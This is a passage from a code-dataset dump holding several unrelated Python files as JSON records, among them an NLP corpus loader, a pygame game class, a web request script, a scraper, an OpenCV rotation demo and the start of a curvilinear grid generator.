corpus_f:\n # open(self.train_path, encoding=\"utf-8\") as train_f, \\\n # open(self.test_path, encoding=\"utf-8\") as test_f:\n for line in corpus_f:\n line = line.strip('\\r\\n\\t')\n sentence = self.cut_sentence(line)\n if sentence == '': continue\n for sent in sentence:\n # 去除每行开始时间\n if len(sent.split()) <= 1: continue # 过滤空字符和仅有分句的标点符号\n if sent.split()[0].split(\"/\")[1] == 't':\n words = sent.split()[1:] # 获取每行第1个及后面元素(去除每行开始时间)\n else:\n words = sent.split()\n\n # line_chars:名 ;line_tags:对应标签(B/M/S/O)\n line_chars, line_tags = self.tag_line(words)\n data.append((line_chars, line_tags))\n\n # 抽样20%作为测试集使用\n if pos % 5 == 0:\n test_data.append((line_chars, line_tags))\n else:\n train_data.append((line_chars, line_tags))\n # isTest = True if pos % 5 == 0 else False\n # saveObj = test_f if isTest else train_f\n # for k, v in enumerate(line_chars):\n # saveObj.write(v + '\\t' + line_tags[k] + '\\n')\n # saveObj.write('\\n')\n pos += 1\n return data, train_data, test_data\n\n # 建立词汇表\n def vocab_build(self):\n data, _, _ = self.load_corpus()\n word2id = {}\n\n # 统计词频, 并设置索引\n for words, tags in data:\n for word in words:\n if word not in word2id:\n word2id[word] = [len(word2id)+1, 1]\n else:\n word2id[word][1] += 1\n\n # 筛选出低频词,并删除\n low_freq_words = []\n for word, [word_index, word_freq] in word2id.items():\n if word_freq < 1:\n low_freq_words.append(word)\n for word in low_freq_words:\n del word2id[word]\n\n new_index = 1\n for word in word2id.keys():\n word2id[word] = new_index\n new_index += 1\n with open(self.vocab_path, 'wb') as fw:\n pickle.dump(word2id, fw)\n return word2id\n\n # 读取词汇表\n def read_vocab(self):\n with open(self.vocab_path, \"rb\") as fn:\n word2id = pickle.load(fn)\n print(\"vocab size:\", len(word2id))\n return word2id\n\n\n # 生成词向量\n def random_embedding(self, word2id):\n \"\"\"\n 随机生成词嵌入,范围[-0.25, 0.25], shape = [词汇数量,embedding_dim]\n vocab : 词汇表\n embedding_dim : 词嵌入纬度\n \"\"\"\n embedding_mat = np.random.uniform(-0.25, 0.25, (len(word2id), self.embedding_dim))\n embedding_mat = np.float32(embedding_mat)\n return embedding_mat\n ## 预训练词向量\n\n\n # 句子在词汇表中的id\n def sentence2id(self, sent, word2id):\n sentence_id = []\n for word in sent:\n if word not in word2id:\n word = ''\n sentence_id.append(word2id[word])\n return sentence_id\n\n def pad_sequences(self, sequences, pad_mark=0):\n # 句子的最大长度\n max_len = max(map(lambda x: len(x), sequences))\n seq_list, seq_len_list = [], []\n for seq in sequences:\n seq = list(seq)\n seq_ = seq[:max_len] + [pad_mark] * max(max_len - len(seq), 0)\n seq_list.append(seq_)\n seq_len_list.append(min(len(seq), max_len))\n return seq_list, seq_len_list\n\n\n # 将句子转化为对应的词id,标注转化为对应的数字\n def batch_yield(self, data, batch_size, word2id, tag2label, shuffle=False):\n if shuffle:\n np.random.shuffle(data)\n\n seqs, labels = [], []\n for (sent_, tag_) in data:\n sent_id = self.sentence2id(sent_, word2id)\n label_id = [tag2label[tag] for tag in tag_]\n\n if len(seqs) == batch_size:\n yield seqs, labels\n seqs, labels = [], []\n\n seqs.append(sent_id)\n labels.append(label_id)\n\n if len(seqs) != 0:\n yield seqs, labels\n\n\n\n\nif __name__==\"__main__\":\n dd = Data(\"data/2014_corpus.txt\")\n data, _, _ = dd.load_corpus()\n # print(data)\n # dd.vocab_build() # 建立词汇表\n with open(\"word2id.pkl\", 'rb') as fr:\n word2id = pickle.load(fr)\n print(word2id)\n\n # 生成随机向量\n embedding_mat = dd.random_embedding(word2id)\n # 根据词汇表生成句子对应的word_id\n sentence_id = dd.sentence2id(\"我爱北京天安门\", word2id)\n print(sentence_id)\n\n\n\n","sub_path":"BiLSTM-CRF/embedding.py","file_name":"embedding.py","file_ext":"py","file_size_in_byte":7376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"641294993","text":"from fly.fly_main import *\n\n\ndef request(url, data=None):\n \"\"\"обёртка запроса в try\"\"\"\n try:\n req = requests.get(url, data=data)\n except requests.exceptions.RequestException as ex:\n exit_message('запрос упал ' + str(ex))\n else:\n if req.status_code not in range(200, 300):\n exit_message('ответ сервера ' + str(req.status_code))\n return req\n\n\nif __name__ == '__main__':\n payload = {\n # 'search': 'Search!',\n # 'reserve-type': 'return',\n 'rt': '',\n 'lang': 'en',\n 'depdate': '09.07.2019',\n 'aptcode1': 'CPH',\n 'rtdate': '13.07.2019',\n 'aptcode2': 'VAR',\n 'paxcount': 1,\n 'infcount': ''\n\n }\n\n # text = request('https://apps.penguin.bg/fly/quote3.aspx', data=payload)\n text = requests.get('https://apps.penguin.bg/fly/quote3.aspx', params=payload, verify=False)\n print('url ', text.url)\n print(text.text)\n with open('temp.htm', 'w') as file:\n file.write(text.text)\n","sub_path":"temp_request.py","file_name":"temp_request.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"548735878","text":"\r\nimport pygame\r\nimport random\r\nimport time\r\nfrom Nastavenia import nastavenia\r\nfrom ObjektyMapa import mapa\r\nfrom Postavy import hrac\r\nimport ObjektyMapa.infObjekty as infObjekty\r\nimport logging\r\nimport Menu.oknoInventar as oknoInventar\r\nimport Menu.enumOknaHra as enumOknaHra\r\nimport Textury.textury as textury\r\nimport math\r\nfrom Textury import enumTextura\r\nimport Crafting.recepty as recepty\r\nfrom Menu.enumOknaHra import EnumOknaHra\r\n\r\n\r\n\r\n\r\n\r\n\r\n'''\r\nzakladna trieda pre okno hry\r\n'''\r\nclass Hra:\r\n def __init__(self,manazerOkien, screen, textury,vlastnosti,typP):\r\n self.manazerOkien = manazerOkien\r\n scale = nastavenia.ROZLISENIA_X[nastavenia.vybrateRozlisenie]/1280\r\n self.screen = screen\r\n #nacitat mapu a tak\r\n self.timeUP = time.time()+1\r\n \r\n self.pocetFPS = 60\r\n self.fpsCount = 0\r\n \r\n self.pocetTPS = nastavenia.RYCHLOST_HRY\r\n self.tpsCount = 0\r\n \r\n self.pocetTickov = 0\r\n \r\n self.allSprites = pygame.sprite.Group()\r\n self.aktivBlitObjMapa = pygame.sprite.LayeredUpdates()\r\n self.postavyGroup = pygame.sprite.Group()\r\n self.mobky = pygame.sprite.Group()\r\n self.mobkyNahanajuceHraca = pygame.sprite.Group()\r\n self.polickaSprites = pygame.sprite.Group()\r\n self.mrtvePostavy = pygame.sprite.Group()\r\n \r\n self.hrac = hrac.Hrac(self,[0,0],typP,textury,vlastnosti,48,48)\r\n \r\n logging.info(\"Vytvorenie mapy\")\r\n self.mapa = mapa.Mapa(self)\r\n \r\n self.hrac.linkMapa(self.mapa)\r\n \r\n recepty.initRecepty(self.hrac)\r\n \r\n logging.info(\"inicializacia mapy\")\r\n self.hrac.update()\r\n \r\n self.initInformacieOHracovi(scale)\r\n self.invOknoRychlyPristup.reinit(self.hrac.dajInventarRychlyPristup())\r\n self.manazerOkien.dajOknoHra(enumOknaHra.EnumOknaHra.INVENTAR).vlozOkno(self.invOknoRychlyPristup)\r\n \r\n\r\n self.casovanieModulo = 0\r\n \r\n \r\n self.aktivBlitObjMapa.draw(self.screen)\r\n self.updateHluku()\r\n #pygame.display.flip()\r\n \r\n self.casNextUpdateStavNpc = 0\r\n\r\n \r\n self.initTime = time.time()\r\n \r\n\r\n \r\n def dajMrtvePostavy(self):\r\n return self.mrtvePostavy\r\n \r\n \r\n def dajGroupMobkyNahanajuceHraca(self):\r\n return self.mobkyNahanajuceHraca\r\n \r\n def dajPostavyGroup(self):\r\n return self.postavyGroup\r\n \r\n def dajManazerOkien(self):\r\n return self.manazerOkien\r\n \r\n def dajMobkyNahanajuceHraca(self):\r\n return self.mobkyNahanajuceHraca\r\n \r\n def dajPocetTickov(self):\r\n return self.pocetTickov\r\n\r\n def dajHraca(self):\r\n return self.hrac\r\n \r\n def dajOknoInventarRychlyPristup(self):\r\n return self.invOknoRychlyPristup\r\n \r\n def dajGroupPreMobky(self):\r\n return self.mobky\r\n\r\n\r\n \r\n def initInformacieOHracovi(self,scale):\r\n width= int(640*scale)\r\n posX = int(320*scale)\r\n posY = int(630*scale)\r\n height = int(80*scale)\r\n self.invOknoRychlyPristup = oknoInventar.OknoInventar(pygame.Rect(posX,posY,width,height),64)\r\n #posX = int(390*scale)\r\n #posY = int(610*scale)\r\n sirka= int(500*scale)\r\n vyska = int(20*scale)\r\n self.healthBar = textury.dajTexturu(enumTextura.EnumTextura.HEALTH_BAR, sirka, vyska)\r\n self.sirkaHpBaru = sirka\r\n self.sirkaUkazovatelaZdravia = sirka\r\n self.updateUkazovatelZdravia(scale)\r\n \r\n posX = int(390*scale)\r\n posY = int(610*scale)\r\n self.poziciaTextHpBar = [posX+sirka/2 -22*scale,posY+2*scale]\r\n \r\n \r\n '''\r\n \r\n pravidelne kontroluje zmenu zdravia aby mohlo dojst k aktualizacii - nie prilis vhodne riesenie \r\n ''' \r\n def skontrolujAktualnostZdravia(self,scale):\r\n #koli efektu - taktiez uz nebude nutne updatovat zdravie hracovi toto to skontroluje\r\n #vzhladom na to ze ide o destinne cila tak porovnavam vzdialenosti 2 bodov od realneho a ktory je na tom lepsie ten sa stane novym\r\n nas = self.hrac.dajHp()/self.hrac.dajMaxHp()\r\n nasGraf = self.sirkaUkazovatelaZdravia/self.sirkaHpBaru\r\n if nas 0:\r\n infObj.scale(nas)\r\n \r\n for obj in infObjekty.objMapaScalovanie:\r\n obj.scale(nas)\r\n obj.updateScreenPosition(self.mapa)\r\n else:\r\n for policko in self.polickaSprites:\r\n policko.updatePozicie(self.mapa)\r\n policko.updateScreenPosition(self.mapa)\r\n \r\n for obj in infObjekty.objMapaScalovanie:\r\n obj.updateScreenPosition(self.mapa)\r\n \r\n for postava in self.mrtvePostavy:\r\n postava.updateScreenPosition(self.mapa)\r\n\r\n\r\n for postava in self.postavyGroup:\r\n postava.updateTopLeft(self.mapa.dajNas())\r\n postava.updateScreenPosition(self.mapa)\r\n try:\r\n postava.updateLayer()\r\n except ValueError:\r\n '''\r\n Pri update pozicie sa postavy mozu zmazat ak sa ocitnu mimo nacitanej oblasti\r\n Ak sa tak stane uz nie je mozne menit layer kedze tato postava bola z groupy uz odstranena.\r\n Pri buducom iterovani cez self.postavyGroup uz tento problem nebude kedze sa tato postava odstrani aj z tohto zoznamu\r\n '''\r\n pass \r\n \r\n \r\n \r\n\r\n \r\n #for sprite in self.aktivBlitObjMapa:\r\n # try:\r\n # sprite.dorobit(self.mapa)\r\n # except:\r\n # pass\r\n \r\n\r\n \r\n\r\n \r\n \r\n self.polickaSprites.draw(self.screen)\r\n self.mrtvePostavy.draw(self.screen)\r\n self.aktivBlitObjMapa.draw(self.screen)\r\n \r\n #self.polickaSpritesTEST.draw(self.screen)\r\n '''\r\n if self.fpsCount == 20:\r\n #print(\"---------------\")\r\n #print (len(self.polickaSprites))\r\n #print (len(self.aktivBlitObjMapa))\r\n '''\r\n if not self.manazerOkien.jeVykresleneNejakeMenu():\r\n self.hrac.vykresliOznacenyPredmet(self.screen)\r\n self.invOknoRychlyPristup.draw(self.screen)\r\n self.vykresliHpBar(self.screen)\r\n \r\n def dajFPS(self):\r\n return self.pocetFPS\r\n def dajTPS(self):\r\n return self.pocetTPS\r\n \r\n def vykresliHpBar(self,screen):\r\n if self.sirkaUkazovatelaZdravia > 0:\r\n pygame.draw.polygon(screen,nastavenia.RED,self.umiestnenieHp)\r\n screen.blit(self.healthBar,(self.umiestnenieHp[0][0],self.umiestnenieHp[0][1]))\r\n \r\n #vykreslenie textu\r\n zdravie = self.hrac.dajHp()\r\n maxZdr = self.hrac.dajMaxHp()\r\n font = textury.dajFont(16)\r\n text = str(str(zdravie) + \"/\" + str(maxZdr))\r\n textSurf = font.render(text, 10, nastavenia.YELLOW)\r\n self.screen.blit(textSurf, self.poziciaTextHpBar)\r\n \r\n def zrusNahananie(self,postava):\r\n for mobka in self.mobkyNahanajuceHraca:\r\n mobka.prestanNahanat(postava)\r\n\r\n \r\n \r\n def dajMapu(self):\r\n return self.mapa\r\n \r\n def klikButton1(self):\r\n self.hrac.klikButton1()\r\n def klikButton2(self):\r\n self.hrac.klikButton2()\r\n def klikButton3(self):\r\n self.hrac.klikButton3()\r\n def klikButton4(self):\r\n self.hrac.klikButton4()\r\n def klikButton5(self):\r\n self.hrac.klikButton5()\r\n \r\n \r\n '''\r\n vykresluje informacie v rohu okna ako je fps tps poziciu hraca \r\n ''' \r\n def vykresliInfoRoh(self):\r\n font = textury.dajFont(16)\r\n \r\n text = str(\"x: \" + str(self.hrac.suradnice[0]) + \" y: \" + str(self.hrac.suradnice[1]))\r\n textSurf = font.render(text, 10, (255,255,0))#ERROR zero width? rychle spustenie do prava\r\n self.screen.blit(textSurf, (10, 10))\r\n \r\n text = \"FPS: \" + str(self.pocetFPS)\r\n textSurf = font.render(text, 10, (255,255,0))\r\n self.screen.blit(textSurf, (10, 30))\r\n \r\n text = \"TPS: \" + str(self.pocetTPS)\r\n textSurf = font.render(text, 10, (255,255,0))\r\n self.screen.blit(textSurf, (10, 50))\r\n \r\n text = \"CP: \" + str(self.manazerOkien.dajPercentoVyuzivaniaCPU()) \r\n textSurf = font.render(text, 10, (255,255,0))\r\n self.screen.blit(textSurf, (10, 70))\r\n \r\n\r\n\r\n \r\n \r\n #self.hracKocka = pygame.Surface((64,64))\r\n #self.hracKocka.fill((255,0,0))\r\n #self.screen.blit(self.hracKocka,(self.hrac.rect.topleft))\r\n pygame.display.flip() \r\n \r\n \r\n '''\r\n update hry kto sa pohol AI a pod\r\n \r\n ''' \r\n def update(self,jePauza):\r\n \r\n if not jePauza:\r\n self.casovanieModulo +=1\r\n self.pocetTickov += 1\r\n scale = nastavenia.ROZLISENIA_X[nastavenia.vybrateRozlisenie]/1280\r\n \r\n \r\n #zlozitostVKroku = time.time()\r\n modulo10 = self.casovanieModulo % 10\r\n modulo100 = self.casovanieModulo % 100\r\n \r\n if modulo100 == 72:\r\n self.mapa.zmenilSaZoom()#len docasne\r\n \r\n self.tpsCount += 1\r\n if time.time() > self.timeUP:\r\n self.timeUP = time.time()+1\r\n self.pocetFPS = self.fpsCount\r\n self.pocetTPS = self.tpsCount\r\n self.tpsCount = 0\r\n self.fpsCount = 0\r\n \r\n self.postavyGroup.update([modulo100])#tu uz je aj hrac\r\n \r\n if modulo10 == 1 or modulo10 == 6: \r\n self.mapa.updateZoom()\r\n \r\n self.riadMobky(modulo100,modulo10)\r\n \r\n for npc in self.mobkyNahanajuceHraca:\r\n npc.cinnostNahanaHraca(modulo100)\r\n\r\n logging.info(\"hrac-eventy\")\r\n self.hrac.eventy()\r\n self.skontrolujAktualnostZdravia(scale)\r\n \r\n casPoslednyFrame = self.manazerOkien.dajCasOdPoslednehoFramu()\r\n #takto cez ify to je pain\r\n if casPoslednyFrame > 0.02:\r\n if random.random() < casPoslednyFrame*20:\r\n return\r\n if casPoslednyFrame > 0.04:\r\n return \r\n casNaNacitanie = 0.000017/casPoslednyFrame\r\n self.mapa.nacitajPolicka(self.hrac, casNaNacitanie)\r\n \r\n \r\n #iba raz za cas napr raz za 2 sec mozno viac\r\n def updateHluku(self):\r\n self.hlukoveCentra = {}\r\n self.hodnotyHlukovychCentier = {}\r\n id = 0\r\n for postava in self.postavyGroup:\r\n esteTrebaUlozit = True\r\n for hlukCentrum in self.hlukoveCentra.values():\r\n vzdialenost = hlukCentrum[0].dajVzdialenostOdPostavy(postava)\r\n if vzdialenost < 200:\r\n hlukCentrum[postava] = postava\r\n self.hodnotyHlukovychCentier[hlukCentrum[0]] += postava.dajHodnotuHluku()\r\n esteTrebaUlozit = False\r\n break\r\n if esteTrebaUlozit:\r\n self.hlukoveCentra[postava] = {0:postava}#nove hlukove centrum\r\n self.hodnotyHlukovychCentier[postava] = postava.dajHodnotuHluku()#leader ako kluc do dic pre hodnoty\r\n \r\n #self.pocetHlukovychCentrier = id-1\r\n \r\n def dajHlukoveCentra(self):\r\n return self.hlukoveCentra\r\n def dajHodnotyHlukovychCentier(self):\r\n return self.hodnotyHlukovychCentier\r\n\r\n def riadMobky(self,modulo100,modulo10):\r\n poc = math.ceil(len(self.mobky)/10)\r\n \r\n if poc == 0:\r\n return\r\n \r\n if modulo100 == 74:\r\n self.updateHluku()\r\n \r\n if modulo100 == 95:\r\n for postava in self.mrtvePostavy:\r\n postava.cekniVymazaniePostavy()\r\n\r\n if modulo10 == 7:\r\n if self.casNextUpdateStavNpc < time.time():\r\n self.casNextUpdateStavNpc = time.time() + 1/len(self.mobky)\r\n samp = random.sample(list(self.mobky),poc)\r\n for mob in samp:\r\n mob.updateZmenStav()\r\n \r\n \r\n \r\n elif modulo10 == 3: # ak je 0 vykonava sa zoom co je operacia zlozita na vypocet preto mu nebudeme pridavat 1 do istoty aby sa tam spravil frame\r\n samp = random.sample(list(self.mobky),poc)\r\n for mob in samp:\r\n mob.updateCinnostStavu()\r\n \r\n \r\n def stlacena0(self):\r\n self.hrac.stlacena0()\r\n \r\n def stlacena1(self):\r\n self.hrac.stlacena1()\r\n \r\n def stlacena2(self):\r\n self.hrac.stlacena2()\r\n \r\n def stlacena3(self):\r\n self.hrac.stlacena3()\r\n \r\n def stlacena4(self):\r\n self.hrac.stlacena4()\r\n \r\n def stlacena5(self):\r\n self.hrac.stlacena5()\r\n \r\n def stlacena6(self):\r\n self.hrac.stlacena6()\r\n \r\n def stlacena7(self):\r\n self.hrac.stlacena7()\r\n \r\n def stlacena8(self):\r\n self.hrac.stlacena8()\r\n \r\n def stlacena9(self):\r\n self.hrac.stlacena9()\r\n \r\n def stlaceneR(self):\r\n self.hrac.stlaceneR()\r\n \r\n \r\n \r\n \r\n \r\n ","sub_path":"Tomas Filip BP/src/hra.py","file_name":"hra.py","file_ext":"py","file_size_in_byte":15985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"179119831","text":"from scipy.stats import skewnorm\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nDATASIZE = 1000\nSKEW_PARAMS = [-3, 0]\n\ndef randn_skew(N, alpha=0.0, loc=0.0, scale=1.0):\n sigma = alpha / np.sqrt(1.0 + alpha**2) \n u0 = np.random.randn(N)\n v = np.random.randn(N)\n u1 = (sigma*u0 + np.sqrt(1.0 - sigma**2)*v) * scale\n u1[u0 < 0] *= -1\n u1 = u1 + loc\n return u1\n\n# lets check again\np = -1 * randn_skew(DATASIZE, -100, 120, 500)\nprint(np.rint(p))\nprint(max(np.rint(p)), min(np.rint(p)), np.average(p))\nplt.plot(p)\nplt.show()\n","sub_path":"sample_scripts/skew_norm.py","file_name":"skew_norm.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"120004675","text":"\n# Þetta sýnidæmi sýnir hvernig gildissvið (á ensku scope) breytu virkar í Python\n# Python hefur svokallað function scope eða fallagildissvið en það þýðir að gildissvið breytu\n# er global/víðvært nema hún sé gerð inni í falli en þá er gildissviðið local/staðvært inni\n# í fallinu.\nname = \"Sveinn\"\n\ndef say_hello():\n # breytan name er víðvær/global og við höfum aðgang að henni inni í fallinu\n print(\"Hello\", name)\n local_breyta = 5\n\n# hinsvegar myndum við ekki geta keyrt eftirfarandi skipun vegna þess að hún er staðvær/local\n# og við höfum þess vegna ekki aðgang að henni þegar við erum ekki stödd inni í fallinu, \n# prófið að taka # af næstu línu og keyra svo forritið til að sjá hvað gerist\n#print(local_breyta)\n\ndef change_my_name(new_name):\n # ef við hefðum sleppt línunni sem segir global name þá hefðum við gert nýja breytu\n # sem hefði staðvært gildissvið og víðværa breytan name hefði ekki breyst\n # prófið að setja # fyrir framan global name og sjáið hvað say_hello() fallið \n # gerir þá.\n global name\n name = new_name \n\nsay_hello()\nchange_my_name(\"Arnar\")\nsay_hello()\n\ntala1, tala2 = 2, 3\n\ndef add_and_plus_one(stiki1, stiki2):\n # stiki1 verður nú 3\n stiki1 += 1\n # summan af 3+3 er 6\n return stiki1 + stiki2\n\nprint(add_and_plus_one(tala1, tala2))\n# en raunstikinn tala1 er óbreyttur, skipunin stiki1 += 1 breytti ekki raunstikanum\nprint(tala1, tala2)\n\n\n","sub_path":"Sýnidæmi/Synidaemi17.py","file_name":"Synidaemi17.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"324094104","text":"import os\r\n\r\ndef displayFiles(filepath):\r\n if os.path.isfile(filepath):\r\n print('File name: ' + filepath)\r\n print(open(filepath).read())\r\n elif os.path.isdir(filepath):\r\n print('Directory name: ' + filepath)\r\n for dir, subdir, files in os.walk(filepath):\r\n for item in files:\r\n displayFiles(filepath + '/' + item)\r\n else:\r\n print('Big trouble')\r\n\r\ndisplayFiles('/Users/family/test')\r\n","sub_path":"IS code examples/Unit 6/viewfiles.py","file_name":"viewfiles.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"355236618","text":"import cv2\nimport numpy as np\nfrom tkinter import *\n\n# src = cv2.imread('ima.png', cv2.IMREAD_UNCHANGED)\n\n# scale_percent = 50\n# width = int(src.shape[1] * scale_percent / 100)\n# height = int(src.shape[0] * scale_percent / 100)\n# desired_size = (width, height)\n\n# image_front_resize = cv2.resize(src, desired_size)\n\n# cv2.imshow('Salida', image_front_resize)\n# cv2.imwrite('fot.png', image_front_resize)\n# cv2.waitKey()\n# cv2.destroyAllWindows()\n\nimage = cv2.imread('ima.png')\nancho = image.shape[1] #columnas\nalto = image.shape[0] # filas\n\n# Rotación\nM = cv2.getRotationMatrix2D((ancho//2,alto//2),1.2,1)\nimageOut = cv2.warpAffine(image,M,(ancho,alto))\ncontador = 0\nwhile True:\n\t# Rotación\n\tcontador = contador + 0.5\n\tif contador == 365:\n\t\tcontador = 0\n\tM = cv2.getRotationMatrix2D((ancho//2,alto//2),contador,1)\n\timageOut = cv2.warpAffine(image,M,(ancho,alto))\n\tcv2.imshow('frame',imageOut)\n\n\tif cv2.waitKey(1) & 0xFF == ord('q'):\n\t\tbreak","sub_path":"rotatePil.py","file_name":"rotatePil.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"81563594","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\n\n# def scrap (url):\n# result = requests.get(search_string, allow_redirects=True)\n# src = result.content\n# soup = BeautifulSoup(src, 'lxml')\n# metas = soup.find_all('meta')\n# search_result = [meta.attrs['content'] for meta in metas if 'name' in meta.attrs and meta.attrs['name'] == 'description']\n# print ([meta.attrs['content'] for meta in metas if 'name' in meta.attrs and meta.attrs['name'] == 'description'])\n# return search_result['items']\n\n\n\nurl=\"https://www.trojmiasto.pl\"\nresult = requests.get(url, allow_redirects=True)\nsrc = result.content\nsoup = BeautifulSoup(src, 'lxml')\n\nmetas = soup.find_all('meta')\n\nsearchresult = [ meta.attrs['content'] for meta in metas if 'name' in meta.attrs and meta.attrs['name'] == 'description' ]\n\nprint(searchresult)\n#\n# searchresult = [ meta.attrs['content'] for meta in metas if 'name' in meta.attrs and meta.attrs['name'] == 'keywords' ]\n\n#print ([ meta.attrs['content'] for meta in metas if 'name' in meta.attrs and meta.attrs['name'] == 'description' ])\n\n#data_soup = BeautifulSoup('
foo!
', features=\"lxml\")\n#lala=soup.find_all('meta') # gitarka\n\n#for metatag in soup.find_all('meta'):\n # desctag=metatag.find('description')\n\n#lala=soup.findAll('div',attrs={\"class\":\"meta\"})\n\n#lala=soup.find_all(attrs={\"description\": \"value\"})\n\n\n#print (lala)\n\n#print(soup.find_all(\"keywords\"))\n\n\n","sub_path":"scrap.py","file_name":"scrap.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"4903571","text":"class Solution(object):\n def minimumTotal(self, triangle):\n \"\"\"\n :type triangle: List[List[int]]\n :rtype: int\n \"\"\"\n # second round\n # 2016-07-12\n # first though dfs, then dp\n if triangle == []:\n return 0\n total = triangle[0]\n for l in triangle[1:]:\n newtotal = [total[0] + l[0]]\n for c in range(1,len(l)-1):\n newtotal.append(min(total[c],total[c-1]) + l[c])\n newtotal.append(total[-1]+l[-1])\n total = newtotal\n \n return min(total)\n \n","sub_path":"120-triangle/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"604621011","text":"# -----------------------------------------------------------------------------------#\n# First iteration: curvilinear grid design tool \n# Started 29/05/18 - Author: Stephen Winn \n# -----------------------------------------------------------------------------------#\n\n\n\n# -----------------------------------------------------------------------------------#\n# Import modules \nimport math\nimport numpy as np\nimport matplotlib \nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\nfrom function import *\nfrom sympy import *\nfrom scipy.optimize import fsolve\n\n# -----------------------------------------------------------------------------------#\n#Force LaTeX use -- taken from E.T.\nfnt = 14 # font size\nrc('text', usetex=True)\nrc('text.latex',preamble=r'\\usepackage{bm}')\nfont = {'family': 'serif',\n 'weight': 'normal',\n 'size': fnt+2,\n }\nmatplotlib.rc('font', **font)\n# -----------------------------------------------------------------------------------#\n# Inputs\nnx = 21 #Points in x \nny = 21 #Points in y\nsf = 1 #Show fig or not \nst = 1 #Show titles \nhlo = 2 #Number of halo points \nnsmx = 500 #Max number of iterations \ntol = 1e-6 #Convergence tolerance\nf1sh = 0 #Show fig 1\nf2sh = 1 #Show fig 2\ndbg = 0 #Show debug infos\ndpi = 600 #DPI for figure saving \ninit = 1 #Initial mesh chooser\nbddf = 1\t #Choose how halo points are set (0 fixed spacing x or y, 1 normal to boundary, 2 zero derivative )\ngctl = 1 #Use the grid control functions \nhfnz = 1 #Only use top half of nozzle \nspc = 1.0 #Grid spacing at halos - units of dxi\nspcy = 1.0 #Halo spacing in y\nspcx = 0.9 #Halo spacing in x\na_pl = 5 #Order of phi in 1-eta\nb_pl = 5 \t #Order of phi in eta\nc_pl = 5 \t #Order of psi in 1-eta\t\nd_pl = 5 #Order of psi in eta\n# -----------------------------------------------------------------------------------#\n# Print stuff out for the user\nprint('-----------------------------------------')\nprint(' Curvilinear grid tool v0.0 ')\nprint('-----------------------------------------')\nprint(' Inputs ')\nprint(' nx = %d' %nx)\nprint(' ny = %d' %ny)\nprint(' tolerance = %f' %tol)\nprint('-----------------------------------------')\n\nif dbg == 1:\n\tprint(' Printing debug messages ' )\t\n\n# -----------------------------------------------------------------------------------#\n#Initialise a few things \nxi = np.linspace(0.0,1.0,nx+1)\neta = np.linspace(0.0,1.0,ny+1)\nx = np.zeros((nx+1,ny+1))\ny\t = np.zeros((nx+1,ny+1))\ndxdeta = np.zeros((nx+1+2*hlo,ny+1+2*hlo))\ndxdxi\t = np.zeros((nx+1+2*hlo,ny+1+2*hlo))\ndydeta = np.zeros((nx+1+2*hlo,ny+1+2*hlo))\ndydxi\t = np.zeros((nx+1+2*hlo,ny+1+2*hlo))\nit = 0 \ndxi = xi[1] - xi[0]\ndeta = eta[1]- eta[0]\nx_old = np.zeros((nx+1+2*hlo,ny+1+2*hlo) )\ny_old = np.zeros((nx+1+2*hlo,ny+1+2*hlo) )\nhl1 = np.zeros(hlo)\nhl2 = np.zeros(hlo)\n\nif bddf == 1 :\n\tnt = np.zeros((nx+1,2))\n\tnb = np.zeros((nx+1,2))\n\tx_rt = np.zeros((nx+1,hlo))\n\tx_rb\t = np.zeros((nx+1,hlo))\n\ty_rt\t = np.zeros((nx+1,hlo))\n\ty_rb\t = np.zeros((nx+1,hlo))\n\nif gctl == 1:\n\tphi = np.zeros((nx+1+2*hlo,ny+1+2*hlo) )\n\tpsi = np.zeros((nx+1+2*hlo,ny+1+2*hlo) )\n\n# some useful numbers\nzro = np.float64(0.)\nuno = np.float64(1.)\ntwo = np.float64(2.)\nnorm = 1.e5\nerr_y = zro\nerr_x = zro\n# ................................................................ FD coeffs\n\n# compute standard centred finite difference coefficients for the\n# 'nth' derivative with order 'ord' accuracy\nnth = 2 # << must be\nord = 4 # << even numbers\nnco = 2*math.floor((nth+1)/2)-1+ord # stencil length\np = np.int((nco - 1)/2) # half stencil length\nif p > hlo:\n\tprint('** FD ERROR: **')\n\tprint('The standard FD stencil is larger than the halo')\n\tprint('Increase hlo or reduce nth')\n\tsys.exit()\nA = np.zeros((nco,nco)) # \nfor i in np.arange(0,nco): # \n\tfor j in np.arange(0,nco): # FD coefficients (coef) are computed by\n\t\tA[i,j] = (-p+j)**i # solving a linear system A.x=b where x\nb = np.zeros((nco)) # is the vector of the 2*p+1 coefficients\nb[nth] = math.factorial(nth) #\ncoef_d2 = np.linalg.solve(A,b) #\n\n# 'nth' derivative with order 'ord' accuracy\nnth = 1 # << must be\nord = 4 # << even numbers\nnco = 2*math.floor((nth+1)/2)-1+ord # stencil length\np = np.int((nco - 1)/2) # half stencil length\nif p > hlo:\n\tprint('** FD ERROR: **')\n\tprint('The standard FD stencil is larger than the halo')\n\tprint('Increase hlo or reduce nth')\n\tsys.exit()\nA = np.zeros((nco,nco)) # \nfor i in np.arange(0,nco): # \n\tfor j in np.arange(0,nco): # FD coefficients (coef) are computed by\n\t\tA[i,j] = (-p+j)**i # solving a linear system A.x=b where x\nb = np.zeros((nco)) # is the vector of the 2*p+1 coefficients\nb[nth] = math.factorial(nth) #\ncoef_d1 = np.linalg.solve(A,b) #\n\nif dbg == 1:\n\tprint('coefficients with order =', ord)\n\tprint('1st 